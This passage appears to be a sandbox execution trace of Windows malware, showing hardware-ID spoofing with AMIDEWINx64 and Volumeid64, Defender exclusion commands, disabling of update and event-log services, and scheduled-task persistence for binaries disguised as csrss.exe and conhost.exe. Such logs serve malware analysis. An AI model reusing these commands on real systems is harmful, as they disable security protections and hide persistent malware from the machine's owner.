                                                              4⤵
                                                                PID:2156
                                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 61095HP-TRGT27817FU
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:4688
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                                                4⤵
                                                                  PID:2132
                                                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 31095HP-TRGT27817DQ
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:4556
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                                                  4⤵
                                                                    PID:916
                                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 71095HP-TRGT27817MST
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:5092
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                    4⤵
                                                                      PID:4456
                                                                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:3016
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: IKOS-KEOR
                                                                      4⤵
                                                                        PID:2396
                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: IKOS-KEOR
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:4012
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: 7PC3-U07K
                                                                        4⤵
                                                                          PID:2840
                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: 7PC3-U07K
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:4920
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: FOPN-D2AA
                                                                          4⤵
                                                                            PID:4868
                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: FOPN-D2AA
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:1088
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 2TR5-8LCK
                                                                            4⤵
                                                                              PID:2332
                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 2TR5-8LCK
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:4004
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: BPIK-C6LZ
                                                                              4⤵
                                                                                PID:1368
                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: BPIK-C6LZ
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2184
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: 8JI4-07UT
                                                                                4⤵
                                                                                  PID:5096
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    5⤵
                                                                                      PID:4164
                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: 8JI4-07UT
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4360
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: IRCF-M2CZ
                                                                                    4⤵
                                                                                      PID:3568
                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: IRCF-M2CZ
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4304
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: ZSPI-6LNH
                                                                                      4⤵
                                                                                        PID:3672
                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: ZSPI-6LNH
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3560
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 92D6-AUE9
                                                                                        4⤵
                                                                                          PID:3516
                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 92D6-AUE9
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:3384
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: CPZI-SEHH
                                                                                          4⤵
                                                                                            PID:3968
                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: CPZI-SEHH
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5016
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: UH3E-HV3O
                                                                                            4⤵
                                                                                              PID:2324
                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: UH3E-HV3O
                                                                                                5⤵
                                                                                                  PID:540
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: UI68-RPO5
                                                                                                4⤵
                                                                                                  PID:1748
                                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: UI68-RPO5
                                                                                                    5⤵
                                                                                                      PID:5032
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: AOP1-6S1H
                                                                                                    4⤵
                                                                                                      PID:3640
                                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: AOP1-6S1H
                                                                                                        5⤵
                                                                                                          PID:4984
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: G2NV-Z953
                                                                                                        4⤵
                                                                                                          PID:4708
                                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: G2NV-Z953
                                                                                                            5⤵
                                                                                                              PID:3852
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 6IHG-O64O
                                                                                                            4⤵
                                                                                                              PID:376
                                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 6IHG-O64O
                                                                                                                5⤵
                                                                                                                  PID:3636
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: VV5Z-PHCK
                                                                                                                4⤵
                                                                                                                  PID:4896
                                                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: VV5Z-PHCK
                                                                                                                    5⤵
                                                                                                                      PID:5092
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 1KLE-ZSBD
                                                                                                                    4⤵
                                                                                                                      PID:4136
                                                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 1KLE-ZSBD
                                                                                                                        5⤵
                                                                                                                          PID:3448
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 5VRS-04H7
                                                                                                                        4⤵
                                                                                                                          PID:2808
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            5⤵
                                                                                                                              PID:3016
                                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 5VRS-04H7
                                                                                                                              5⤵
                                                                                                                                PID:1424
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 8ZFB-VI2K
                                                                                                                              4⤵
                                                                                                                                PID:3680
                                                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 8ZFB-VI2K
                                                                                                                                  5⤵
                                                                                                                                    PID:2892
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: NZ4H-5P3U
                                                                                                                                  4⤵
                                                                                                                                    PID:368
                                                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: NZ4H-5P3U
                                                                                                                                      5⤵
                                                                                                                                        PID:972
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 4TCZ-12D7
                                                                                                                                      4⤵
                                                                                                                                        PID:3320
                                                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 4TCZ-12D7
                                                                                                                                          5⤵
                                                                                                                                            PID:3712
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: MSKU-SLZ4
                                                                                                                                          4⤵
                                                                                                                                            PID:2672
                                                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: MSKU-SLZ4
                                                                                                                                              5⤵
                                                                                                                                                PID:2100
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 40CT-OA6V
                                                                                                                                              4⤵
                                                                                                                                                PID:2432
                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 40CT-OA6V
                                                                                                                                                  5⤵
                                                                                                                                                    PID:4024
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
                                                                                                                                                  4⤵
                                                                                                                                                    PID:728
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
                                                                                                                                                    4⤵
                                                                                                                                                      PID:3608
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
                                                                                                                                                      4⤵
                                                                                                                                                        PID:4344
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
                                                                                                                                                        4⤵
                                                                                                                                                          PID:2444
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
                                                                                                                                                          4⤵
                                                                                                                                                            PID:2804
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3916
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5156
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
                                                                                                                                                              3⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                              PID:4004
                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                PID:4052
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "
                                                                                                                                                                  5⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:2464
                                                                                                                                                                  • C:\ChainReview\sphyperRuntimedhcpSvc.exe
                                                                                                                                                                    "C:\ChainReview/sphyperRuntimedhcpSvc.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:4308
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\csrss.exe'
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:4876
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\conhostsft.exe'
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:3236
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\StartMenuExperienceHost.exe'
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:1872
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\Idle.exe'
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:2228
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\VideoLAN\VLC\plugins\misc\conhost.exe'
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:5032
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\PEhx2LImij.bat"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:2932
                                                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                                                          chcp 65001
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:1540
                                                                                                                                                                          • C:\Windows\system32\w32tm.exe
                                                                                                                                                                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:3428
                                                                                                                                                                            • C:\Program Files\7-Zip\Lang\csrss.exe
                                                                                                                                                                              "C:\Program Files\7-Zip\Lang\csrss.exe"
                                                                                                                                                                              8⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                              PID:3228
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\conhostsft.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\conhostsft.exe"
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    PID:3056
                                                                                                                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:4136
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:2592
                                                                                                                                                                        • C:\Windows\system32\wusa.exe
                                                                                                                                                                          wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:844
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:2656
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:756
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:1624
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:4440
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:1224
                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Power Settings
                                                                                                                                                                          PID:1916
                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Power Settings
                                                                                                                                                                          PID:4768
                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Power Settings
                                                                                                                                                                          PID:2900
                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Power Settings
                                                                                                                                                                          PID:2684
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe delete "driverupdate"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:1852
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:2368
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:4188
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe start "driverupdate"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:4868
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\VC_redistx64.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\VC_redistx64.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:3244
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                          4⤵
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                          PID:876
                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                            schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                                            5⤵
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                            PID:804
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\Lang\csrss.exe'" /f
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:3640
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:3632
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:4060
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    schtasks.exe /create /tn "conhostsftc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\conhostsft.exe'" /f
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:540
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    schtasks.exe /create /tn "conhostsft" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\conhostsft.exe'" /rl HIGHEST /f
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:3000
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    schtasks.exe /create /tn "conhostsftc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\conhostsft.exe'" /rl HIGHEST /f
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:728
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\ChainReview\StartMenuExperienceHost.exe'" /f
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:2264
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\ChainReview\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:5008
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\ChainReview\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:2312
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /f
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:756
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:1328
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:4340
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files\VideoLAN\VLC\plugins\misc\conhost.exe'" /f
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
